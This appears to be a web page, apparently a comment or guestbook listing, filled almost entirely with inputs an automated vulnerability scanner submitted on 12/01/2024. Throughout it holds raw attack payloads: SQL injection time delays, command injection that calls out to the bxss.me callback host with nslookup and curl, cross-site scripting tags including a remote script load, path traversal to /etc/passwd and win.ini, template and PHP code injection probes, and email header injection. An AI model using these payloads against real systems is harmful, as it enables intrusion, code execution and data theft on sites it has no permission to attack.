XcwJRDFY\u003CScRiPt\E1Ms(9781)\u003C/sCripT\u003E
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1; waitfor delay '0:0:15' --

image
&nslookup -q=cname hitiuivilnsmj2ef53.bxss.me&'\"`0&nslookup -q=cname hitiuivilnsmj2ef53.bxss.me&`'
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1); waitfor delay '0:0:15' --

image
&(nslookup -q=cname hitwdminzdwhbfcfb4.bxss.me||curl hitwdminzdwhbfcfb4.bxss.me)&'\"`0&(nslookup -q=cname hitwdminzdwhbfcfb4.bxss.me||curl hitwdminzdwhbfcfb4.bxss.me)&`'
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1)); waitfor delay '0:0:15' --

image
|(nslookup -q=cname hittoyakmkzgh6007f.bxss.me||curl hittoyakmkzgh6007f.bxss.me)
12/01/2024

1

image
XcwJRDFY
12/01/2024

1\u003CScRiPt\yym6(9237)\u003C/sCripT\u003E

image
XcwJRDFY
12/01/2024

1 waitfor delay '0:0:15' --

image
`(nslookup -q=cname hitwzimbwclgt15637.bxss.me||curl hitwzimbwclgt15637.bxss.me)`
12/01/2024

1

image
XcwJRDFY
12/01/2024

XoDSeInJ'; waitfor delay '0:0:15' --

image
XcwJRDFY
12/01/2024

Http://bxss.me/t/fit.txt

image
;(nslookup -q=cname hityuhdzjmcicb0a6b.bxss.me||curl hityuhdzjmcicb0a6b.bxss.me)|(nslookup -q=cname hityuhdzjmcicb0a6b.bxss.me||curl hityuhdzjmcicb0a6b.bxss.me)&(nslookup -q=cname hityuhdzjmcicb0a6b.bxss.me||curl hityuhdzjmcicb0a6b.bxss.me)
12/01/2024

1

image
XcwJRDFY
12/01/2024

http://bxss.me/t/fit.txt?.jpg

image
XcwJRDFY
12/01/2024

Qx7y4ctz'); waitfor delay '0:0:15' --

image
XcwJRDFY
12/01/2024

c:/windows/win.ini

image
XcwJRDFY
12/01/2024

-5) OR 714=(SELECT 714 FROM PG_SLEEP(15))--

image
XcwJRDFY
12/01/2024

bxss.me

image
XcwJRDFY
12/01/2024

-1)) OR 888=(SELECT 888 FROM PG_SLEEP(15))--

image
Http://bxss.me/t/fit.txt
12/01/2024

1

image
XcwJRDFY<input autofocus onfocus=E1Ms(9292)>
12/01/2024

1

image
XcwJRDFY
12/01/2024

IeyNkbv7')) OR 77=(SELECT 77 FROM PG_SLEEP(15))--

image
XcwJRDFY
12/01/2024

^(#$!@#$)(()))******

image
XcwJRDFY
12/01/2024

1<input autofocus onfocus=yym6(9603)>

image
http://bxss.me/t/fit.txt?.jpg
12/01/2024

1

image
XcwJRDFY
12/01/2024

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

image
)
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

image
bxss.me
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'"

image
!(()&&!|*|*|
12/01/2024

1

image
<a HrEF=http://xss.bxss.me></a>
12/01/2024

1

image
XcwJRDFY
12/01/2024

@@fzeEr

image
XcwJRDFY}body{zzz:Expre/**/SSion(E1Ms(9059))}
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1}body{zzz:Expre/**/SSion(yym6(9007))}

image
2J7sGQMR
12/01/2024

1

image
-1 OR 2+590-590-1=0+0+0+1 --
12/01/2024

1

image
XcwJRDFY
12/01/2024

'.gethostbyname(lc('hitkl'.'wcczmjyw6e614.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(70).chr(105).chr(80).'

image
'.gethostbyname(lc('hitko'.'wmfmpspha417c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(103).chr(72).chr(117).chr(66).'
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'&&sleep(27*1000)*mznate&&'

image
XcwJRDFY
12/01/2024

1"&&sleep(27*1000)*sevjif&&"

image
-1" OR 2+571-571-1=0+0+0+1 --
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'||sleep(27*1000)*cnzvgj||'

image
XcwJRDFY
12/01/2024

1 bcc:0.705-27508.705.d5895.19734.2@bxss.me

image
XcwJRDFY<WBLQQ3>I0OGG[!+!]</WBLQQ3>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<WCETEX>5DEGL[!+!]</WCETEX>

image
XcwJRDFY
12/01/2024

1"||sleep(27*1000)*sqwedh||"

image
XcwJRDFY
12/01/2024

to@example.com> bcc:0.705-27509.705.d5895.19734.2@bxss.me

image
if(now()=sysdate(),sleep(15),0)
12/01/2024

1

image
XcwJRDFY
12/01/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
XcwJRDFY
12/01/2024

';print(md5(31337));$a='

image
XcwJRDFY bcc:0.705-27510.705.d5895.19734.2@bxss.me
12/01/2024

1

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
12/01/2024

1

image
XcwJRDFY
12/01/2024

";print(md5(31337));$a="

image
XcwJRDFY
12/01/2024

${@print(md5(31337))}\

image
XcwJRDFY<ifRAme sRc=9276.com></IfRamE>
12/01/2024

1

image
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
12/01/2024

1

image
XcwJRDFY
12/01/2024

HttP://bxss.me/t/xss.html?%00

image
XcwJRDFY
12/01/2024

1<ifRAme sRc=9044.com></IfRamE>

image
XcwJRDFY
12/01/2024

'.print(md5(31337)).'

image
XcwJRDFY
12/01/2024

bxss.me/t/xss.html?%00

image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
12/01/2024

1

image
XcwJRDFY'&&sleep(27*1000)*orgrdl&&'
12/01/2024

1

image
';print(md5(31337));$a='
12/01/2024

1

image
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
12/01/2024

1

image
XcwJRDFY
12/01/2024

"+"A".concat(70-3).concat(22*4).concat(114).concat(84).concat(115).concat(75)+(require"socket" Socket.gethostbyname("hittz"+"vyfoihnf4e337.bxss.me.")[3].to_s)+"

image
bxss.me/t/xss.html?%00
12/01/2024

1

image
XcwJRDFY<aiWSSaA x=9886>
12/01/2024

1

image
XcwJRDFY"&&sleep(27*1000)*pcvngb&&"
12/01/2024

1

image
XcwJRDFY
12/01/2024

'+'A'.concat(70-3).concat(22*4).concat(105).concat(81).concat(111).concat(82)+(require'socket' Socket.gethostbyname('hitdx'+'lgmfbzcd95f0c.bxss.me.')[3].to_s)+'

image
XcwJRDFY
12/01/2024

1<ag0hPb5 x=9094>

image
";print(md5(31337));$a="
12/01/2024

1

image
"+"A".concat(70-3).concat(22*4).concat(100).concat(73).concat(101).concat(72)+(require"socket" Socket.gethostbyname("hitsb"+"zazuiobn18a93.bxss.me.")[3].to_s)+"
12/01/2024

1

image
${@print(md5(31337))}
12/01/2024

1

image
XcwJRDFY"||sleep(27*1000)*bundbq||"
12/01/2024

1

image
${@print(md5(31337))}\
12/01/2024

1

image
1 waitfor delay '0:0:15' --
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
Y5OAMt11'; waitfor delay '0:0:15' --
12/01/2024

1

image
XcwJRDFY
12/01/2024

comment

image
XcwJRDFY
12/01/2024

xfs.bxss.me

image
XcwJRDFY
12/01/2024

comment

image
yfRN2kGn'); waitfor delay '0:0:15' --
12/01/2024

1

image
xfs.bxss.me
12/01/2024

1

image
XcwJRDFY
12/01/2024

comment/.

image
comment
12/01/2024

1

image
XsYqNoZ2' OR 243=(SELECT 243 FROM PG_SLEEP(15))--
12/01/2024

1

image
comment
12/01/2024

1

image
XcwJRDFY
12/01/2024

'"

image
Aov1cZ1E') OR 320=(SELECT 320 FROM PG_SLEEP(15))--
12/01/2024

1

image
comment/.
12/01/2024

1

image
XcwJRDFY
12/01/2024

<!--

image
JBqVPREf')) OR 929=(SELECT 929 FROM PG_SLEEP(15))--
12/01/2024

1

image
'"
12/01/2024

1

image
<!--
12/01/2024

1

image
1'"
12/01/2024

1

image
@@WjRKp
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'"()&%<zzz><ScRiPt >WYqb(9045)</ScRiPt>

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

19753114

image
XcwJRDFY
12/01/2024

bfg5046<s1﹥s2ʺs3ʹhjl5046

image
XcwJRDFY
12/01/2024

<%={{={@{#{${dfb}}%>

image
XcwJRDFY
12/01/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
XcwJRDFY
12/01/2024

dfb[[${98991*97996}]]xca

image
XcwJRDFY
12/01/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
XcwJRDFY
12/01/2024

19683"();}]9080

image
XcwJRDFY
12/01/2024

%31%39%37%34%35%22%28%29%3B%7D%5D%39%30%32%36

image
XcwJRDFY
12/01/2024

1</script><script>WYqb(9389)</script>

image
XcwJRDFY'"()&%<zzz><ScRiPt >WYqb(9993)</ScRiPt>
12/01/2024

1

image
'"()&%<zzz><ScRiPt >WYqb(9654)</ScRiPt>
12/01/2024

1

image
XcwJRDFY9246745
12/01/2024

1

image
<%={{={@{#{${dfb}}%>
12/01/2024

1

image
<th:t="${dfb}#foreach
12/01/2024

1

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
dfb[[${98991*97996}]]xca
12/01/2024

1

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
XcwJRDFY</script><script>WYqb(9310)</script>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'"()&%<zzz><ScRiPt >L7Nl(9373)</ScRiPt>

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

-1' OR 2+842-842-1=0+0+0+1 --

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

if(now()=sysdate(),sleep(15),0)

image
/../../../../../../../../../../windows/system32/BITSADMIN.exe
12/01/2024

1

image
HfjNUlYZ
12/01/2024

-1; waitfor delay '0:0:15' --

image
HfjNUlYZ
12/01/2024

response.write(9743634*9339462)

image
'+response.write(9785768*9739791)+'
12/01/2024

1

image
HfjNUlYZ
12/01/2024

../../../../../../../../../../../../../../etc/passwd

image
HfjNUlYZ
12/01/2024

-5 OR 629=(SELECT 629 FROM PG_SLEEP(15))--

image
XcwJRDFY
12/01/2024

1

image
echo nebzpl$()\ ylyibs\nz^xyu||a #' &echo nebzpl$()\ ylyibs\nz^xyu||a #|" &echo nebzpl$()\ ylyibs\nz^xyu||a #
12/01/2024

1

image
HfjNUlYZ
12/01/2024

http://bxss.me/t/fit.txt?.jpg

image
HfjNUlYZ
12/01/2024

1

image
|echo gvzssi$()\ yinmfb\nz^xyu||a #' |echo gvzssi$()\ yinmfb\nz^xyu||a #|" |echo gvzssi$()\ yinmfb\nz^xyu||a #
12/01/2024

1

image
HfjNUlYZ
12/01/2024

c:/windows/win.ini

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

bxss.me

image
-1 OR 2+847-847-1=0+0+0+1 --
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1'"()&%<zzz><ScRiPt >gk43(9110)</ScRiPt>

image
$(nslookup -q=cname hitutpwebgmpo0d16f.bxss.me||curl hitutpwebgmpo0d16f.bxss.me)
12/01/2024

1

image
Http://bxss.me/t/fit.txt
12/01/2024

1

image
-1' OR 2+671-671-1=0+0+0+1 --
12/01/2024

1

image
&nslookup -q=cname hithfyfvgojnd346a1.bxss.me&'\"`0&nslookup -q=cname hithfyfvgojnd346a1.bxss.me&`'
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'"()

image
http://bxss.me/t/fit.txt?.jpg
12/01/2024

1

image
HfjNUlYZ'"()&%<zzz><ScRiPt >pTbh(9914)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1'&&sleep(27*1000)*smzxtn&&'

image
-1' OR 2+739-739-1=0+0+0+1 or 'X184QfRS'='
12/01/2024

1

image
&(nslookup -q=cname hitqjvxgitbmue1d49.bxss.me||curl hitqjvxgitbmue1d49.bxss.me)&'\"`0&(nslookup -q=cname hitqjvxgitbmue1d49.bxss.me||curl hitqjvxgitbmue1d49.bxss.me)&`'
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1"&&sleep(27*1000)*rcvnxr&&"

image
/etc/shells
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1'||sleep(27*1000)*chbafq||'

image
-1" OR 2+145-145-1=0+0+0+1 --
12/01/2024

1

image
|(nslookup -q=cname hitpbfndzymmfa5851.bxss.me||curl hitpbfndzymmfa5851.bxss.me)
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'"()&%<zzz><ScRiPt >gk43(9604)</ScRiPt>

image
`(nslookup -q=cname hiterrhiicjns9fbf4.bxss.me||curl hiterrhiicjns9fbf4.bxss.me)`
12/01/2024

1

image
bxss.me
12/01/2024

1

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
12/01/2024

1

image
HfjNUlYZ9103685
12/01/2024

1

image
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
12/01/2024

1

image
'"()
12/01/2024

1

image
HfjNUlYZ'&&sleep(27*1000)*nxbrib&&'
12/01/2024

1

image
1 waitfor delay '0:0:15' --
12/01/2024

1

image
HfjNUlYZ"&&sleep(27*1000)*gapphm&&"
12/01/2024

1

image
gQfeN2L3'; waitfor delay '0:0:15' --
12/01/2024

1

image
HfjNUlYZ'||sleep(27*1000)*nanllz||'
12/01/2024

1

image
VWfpAMdy'); waitfor delay '0:0:15' --
12/01/2024

1

image
HfjNUlYZ"||sleep(27*1000)*dehbiv||"
12/01/2024

1

image
uIlzsjUl')); waitfor delay '0:0:15' --
12/01/2024

1

image
yh5v4i4M') OR 366=(SELECT 366 FROM PG_SLEEP(15))--
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
".gethostbyname(lc("hitmx"."oskrxamc8df38.bxss.me."))."A".chr(67).chr(hex("58")).chr(117).chr(87).chr(104).chr(83)."
12/01/2024

1

image
HfjNUlYZ'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
12/01/2024

1

image
1'"
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1 bcc:0.696-23545.696.18c3d.19734.2@bxss.me

image
HfjNUlYZ
12/01/2024

to@example.com> bcc:0.696-23546.696.18c3d.19734.2@bxss.me

image
HfjNUlYZ
12/01/2024

"+"A".concat(70-3).concat(22*4).concat(115).concat(70).concat(101).concat(74)+(require"socket" Socket.gethostbyname("hitfn"+"xqexgfxf2c6c8.bxss.me.")[3].to_s)+"

image
HfjNUlYZ
12/01/2024

comment

image
dfb{{98991*97996}}xca
12/01/2024

1

image
${@print(md5(31337))}
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
'"
12/01/2024

1

image
dfb${98991*97996}xca
12/01/2024

1

image
${@print(md5(31337))}\
12/01/2024

1

image
dfb{#98991*97996}xca
12/01/2024

1

image
dfb@(98991*97996)xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

<%={{={@{#{${dfb}}%>

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

<th:t="${dfb}#foreach

image
HfjNUlYZ
12/01/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

19170"();}]9004

image
AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
12/01/2024

1

image
HfjNUlYZ
12/01/2024

%31%39%33%34%32%22%28%29%3B%7D%5D%39%39%36%37

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
HfjNUlYZ9721332
12/01/2024

1

image
HfjNUlYZ<ScRiPt >pTbh(9495)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ<WVL0I8>DLTRA[!+!]</WVL0I8>
12/01/2024

1

image
HfjNUlYZ<script>pTbh(9942)</script>
12/01/2024

1

image
HfjNUlYZ<script>pTbh(9876)</script>9876
12/01/2024

1

image
HfjNUlYZ<ScRiPt >pTbh(9401)</ScRiPt>
12/01/2024

1

image
bfg3736<s1﹥s2ʺs3ʹhjl3736
12/01/2024

1

image
HfjNUlYZ<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9062></ScRiPt>
12/01/2024

1

image
<%={{={@{#{${dfb}}%>
12/01/2024

1

image
HfjNUlYZ<ScRiPt >pTbh(9970)</ScRiPt>
12/01/2024

1

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
HfjNUlYZ<body onload=pTbh(9309)>
12/01/2024

1

image
HfjNUlYZ<img src=//xss.bxss.me/t/dot.gif onload=pTbh(9035)>
12/01/2024

1

image
%48%66%6A%4E%55%6C%59%5A%39%33%38%38%22%28%29%3B%7D%5D%39%33%34%34
12/01/2024

1

image
HfjNUlYZ<img/src=">" onerror=alert(9670)>
12/01/2024

1

image
%48%66%6A%4E%55%6C%59%5A%3C%53%63%52%69%50%74%20%3E%70%54%62%68%289587%29%3C%2F%73%43%72%69%70%54%3E
12/01/2024

1

image
HfjNUlYZ\u003CScRiPt\pTbh(9187)\u003C/sCripT\u003E
12/01/2024

1

image
HfjNUlYZ&lt;ScRiPt&gt;pTbh(9863)&lt;/sCripT&gt;
12/01/2024

1

image
HfjNUlYZ<input autofocus onfocus=pTbh(9481)>
12/01/2024

1

image
<a HrEF=http://xss.bxss.me></a>
12/01/2024

1

image
HfjNUlYZ}body{zzz:Expre/**/SSion(pTbh(9404))}
12/01/2024

1

image
HfjNUlYZcPwbF <ScRiPt >pTbh(9940)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ<W0EWUM>IOSMU[!+!]</W0EWUM>
12/01/2024

1

image
HfjNUlYZ<a5421Xg x=9965>
12/01/2024

1

image
HfjNUlYZ<img sRc='http://attacker-9247/log.php?
12/01/2024

1

image
HfjNUlYZ<aJRdirq<
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'"()&%<zzz><ScRiPt >RQP7(9957)</ScRiPt>

image
XcwJRDFY
12/01/2024

'"()&%<zzz><ScRiPt >RQP7(9767)</ScRiPt>

image
XcwJRDFY'"()&%<zzz><ScRiPt >OWCS(9604)</ScRiPt>
12/01/2024

1

image
'"()&%<zzz><ScRiPt >OWCS(9897)</ScRiPt>
12/01/2024

1

image
XcwJRDFY9479251
12/01/2024

1

image
XcwJRDFY9106883
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'"()&%<zzz><ScRiPt >wo2Z(9398)</ScRiPt>

image
<%={{={@{#{${dfb}}%>
12/01/2024

1

image
<%={{={@{#{${dfb}}%>
12/01/2024

1

image
<th:t="${dfb}#foreach
12/01/2024

1

image
XcwJRDFY
12/01/2024

bfg5873<s1﹥s2ʺs3ʹhjl5873

image
<th:t="${dfb}#foreach
12/01/2024

1

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

<%={{={@{#{${dfb}}%>

image
XcwJRDFY
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
dfb{98991*97996}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

<th:t="${dfb}#foreach

image
"%}dfb{{98991*97996}}xca
12/01/2024

1

image
dfb${98991*97996}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
"}dfb{98991*97996}xca
12/01/2024

1

image
dfb#{98991*97996}xca
12/01/2024

1

image
dfb{#98991*97996}xca
12/01/2024

1

image
"}dfb#{98991*97996}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
dfb{@98991*97996}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
XcwJRDFY
12/01/2024

dfb{{98991*97996}}xca

image
dfb{{=98991*97996}}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

dfb[[${98991*97996}]]xca

image
"}dfb{@98991*97996}xca
12/01/2024

1

image
dfb@(98991*97996)xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

dfb__${98991*97996}__::.x

image
"}}dfb{{=98991*97996}}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<ScRiPt >wo2Z(9355)</ScRiPt>

image
dfb{{"abc"|title}}xca
12/01/2024

1

image
"%>dfb<%=98991*97996%>xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<WXSEWX>LE9JM[!+!]</WXSEWX>

image
print("dfb" . 98991*97996 . "xca");
12/01/2024

1

image
"}dfb#set($x=98991*97996)${x}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<script>wo2Z(9121)</script>

image
HfjNUlYZ
12/01/2024

1

image
98991*97996*98991*97996
12/01/2024

1

image
"}dfb{{"abc"|title}}xca
12/01/2024

1

image
dfb{@math key=98991 method="multiply" operand=97996/}xca
12/01/2024

1

image
"print("dfb" . 98991*97996 . "xca");
12/01/2024

1

image
dfb{{{this}}}xca
12/01/2024

1

image
"98991*97996*98991*97996
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<ScR<ScRiPt>IpT>wo2Z(9231)</sCr<ScRiPt>IpT>

image
HfjNUlYZ
12/01/2024

1

image
#{98991*97996*98991*97996}
12/01/2024

1

image
"}dfb{@math key=98991 method="multiply" operand=97996/}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<ScRiPt >wo2Z(9415)</ScRiPt>

image
"}}}dfb{{{this}}}xca
12/01/2024

1

image
dfb{{'abcd'.toUpperCase()}}xca
12/01/2024

1

image
"}#{98991*97996*98991*97996}
12/01/2024

1

image
AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<ScRiPt >wo2Z(9583)</ScRiPt>

image
"}dfb#{xca}=123
12/01/2024

1

image
"}}dfb{{'abcd'.toUpperCase()}}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<isindex type=image src=1 onerror=wo2Z(9931)>

image
"}}dfb{{98991*97996}}xca
12/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
"}dfb[[${98991*97996}]]xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<img src=//xss.bxss.me/t/dot.gif onload=wo2Z(9700)>

image
"dfb__${98991*97996}__::.x
12/01/2024

1

image
XcwJRDFY<ScRiPt >U0OM(9869)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1'"()&%<zzz><ScRiPt >YYsF(9437)</ScRiPt>

image
HfjNUlYZ
12/01/2024

1'"()&%<zzz><ScRiPt >A6Yq(9767)</ScRiPt>

image
XcwJRDFY
12/01/2024

1<img src=xyz OnErRor=wo2Z(9185)>

image
"}"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
XcwJRDFY<WJLEEN>EAHNW[!+!]</WJLEEN>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<img/src=">" onerror=alert(9662)>

image
'}}dfb{{98991*97996}}xca
12/01/2024

1

image
XcwJRDFY<script>U0OM(9444)</script>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'"()&%<zzz><ScRiPt >YYsF(9042)</ScRiPt>

image
XcwJRDFY
12/01/2024

%31%3C%53%63%52%69%50%74%20%3E%77%6F%32%5A%289655%29%3C%2F%73%43%72%69%70%54%3E

image
'%}dfb{{98991*97996}}xca
12/01/2024

1

image
XcwJRDFY<script>U0OM(9115)</script>9115
12/01/2024

1

image
'"()&%<zzz><ScRiPt >c8dD(9474)</ScRiPt>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1\u003CScRiPt\wo2Z(9742)\u003C/sCripT\u003E

image
XcwJRDFY<ScR<ScRiPt>IpT>U0OM(9490)</sCr<ScRiPt>IpT>
12/01/2024

1

image
'}dfb${98991*97996}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

1&lt;ScRiPt&gt;wo2Z(9995)&lt;/sCripT&gt;

image
XcwJRDFY<ScRiPt >U0OM(9138)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ9774310
12/01/2024

1

image
'}dfb#{98991*97996}xca
12/01/2024

1

image
1CRLBfFVdxO
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY<ScRiPt >U0OM(9586)</ScRiPt>
12/01/2024

1

image
'}dfb{@98991*97996}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

<%={{={@{#{${dfb}}%>

image
UWhHQzduTkc=
12/01/2024

1

image
HfjNUlYZ
12/01/2024

<th:t="${dfb}#foreach

image
'}}dfb{{=98991*97996}}xca
12/01/2024

1

image
XcwJRDFY<isindex type=image src=1 onerror=U0OM(9669)>
12/01/2024

1

image
XcwJRDFY
12/01/2024

response.write(9645589*9244821)

image
XcwJRDFY
12/01/2024

'+response.write(9645589*9244821)+'

image
HfjNUlYZ
12/01/2024

dfb{{98991*97996}}xca

image
XcwJRDFY
12/01/2024

"+response.write(9645589*9244821)+"

image
XcwJRDFY<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9914'>
12/01/2024

1

image
'+response.write(9169810*9222965)+'
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb[[${98991*97996}]]xca

image
HfjNUlYZ
12/01/2024

dfb__${98991*97996}__::.x

image
XcwJRDFY<body onload=U0OM(9082)>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1Lnams <ScRiPt >wo2Z(9226)</ScRiPt>

image
HfjNUlYZ
12/01/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
XcwJRDFY
12/01/2024

1<WU0QXD>FNFKG[!+!]</WU0QXD>

image
XcwJRDFY<img src=//xss.bxss.me/t/dot.gif onload=U0OM(9051)>
12/01/2024

1

image
'}dfb{{"abc"|title}}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<ScRiPt >A6Yq(9982)</ScRiPt>

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
'print("dfb" . 98991*97996 . "xca");
12/01/2024

1

image
XcwJRDFY<img src=xyz OnErRor=U0OM(9056)>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<WS8LVU>V35ZP[!+!]</WS8LVU>

image
XcwJRDFY
12/01/2024

cAnJxQB0

image
XcwJRDFY
12/01/2024

../../../../../../../../../../../../../../windows/win.ini

image
XcwJRDFY
12/01/2024

-1 OR 2+249-249-1=0+0+0+1 --

image
XcwJRDFY
12/01/2024

&echo kanrge$()\ dyrujc\nz^xyu||a #' &echo kanrge$()\ dyrujc\nz^xyu||a #|" &echo kanrge$()\ dyrujc\nz^xyu||a #

image
XcwJRDFY
12/01/2024

-1 OR 2+741-741-1=0+0+0+1

image
'98991*97996*98991*97996
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1&echo viwirm$()\ xrwxel\nz^xyu||a #' &echo viwirm$()\ xrwxel\nz^xyu||a #|" &echo viwirm$()\ xrwxel\nz^xyu||a #

image
../../../../../../../../../../../../../../etc/passwd
12/01/2024

1

image
file:///etc/passwd
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1" OR 2+735-735-1=0+0+0+1 --

image
XcwJRDFY
12/01/2024

1<img sRc='http://attacker-9730/log.php?

image
response.write(9496089*9650491)
12/01/2024

1

image
XcwJRDFY
12/01/2024

$(nslookup -q=cname hitgzequybjphce3c2.bxss.me||curl hitgzequybjphce3c2.bxss.me)

image
XcwJRDFY
12/01/2024

1

image
"+response.write(9496089*9650491)+"
12/01/2024

1

image
%58%63%77%4A%52%44%46%59%3C%53%63%52%69%50%74%20%3E%55%30%4F%4D%289914%29%3C%2F%73%43%72%69%70%54%3E
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<ScR<ScRiPt>IpT>A6Yq(9545)</sCr<ScRiPt>IpT>

image
HfjNUlYZ
12/01/2024

1

image
XcwJRDFY
12/01/2024

if(now()=sysdate(),sleep(15),0)

image
../XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

&nslookup -q=cname hitpdpfnlffzd4762a.bxss.me&'\"`0&nslookup -q=cname hitpdpfnlffzd4762a.bxss.me&`'

image
'}}}dfb{{{this}}}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

1<aLc1elD<

image
XcwJRDFY
12/01/2024

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

image
XcwJRDFY
12/01/2024

|(nslookup -q=cname hitqavdcssczxc73fb.bxss.me||curl hitqavdcssczxc73fb.bxss.me)

image
HfjNUlYZ<esi:include src="http://bxss.me/rpb.png"/>
12/01/2024

1

image
XcwJRDFY
12/01/2024

`(nslookup -q=cname hitzihxzxwgia30f40.bxss.me||curl hitzihxzxwgia30f40.bxss.me)`

image
XcwJRDFY
12/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
'}#{98991*97996*98991*97996}
12/01/2024

1

image
XcwJRDFY
12/01/2024

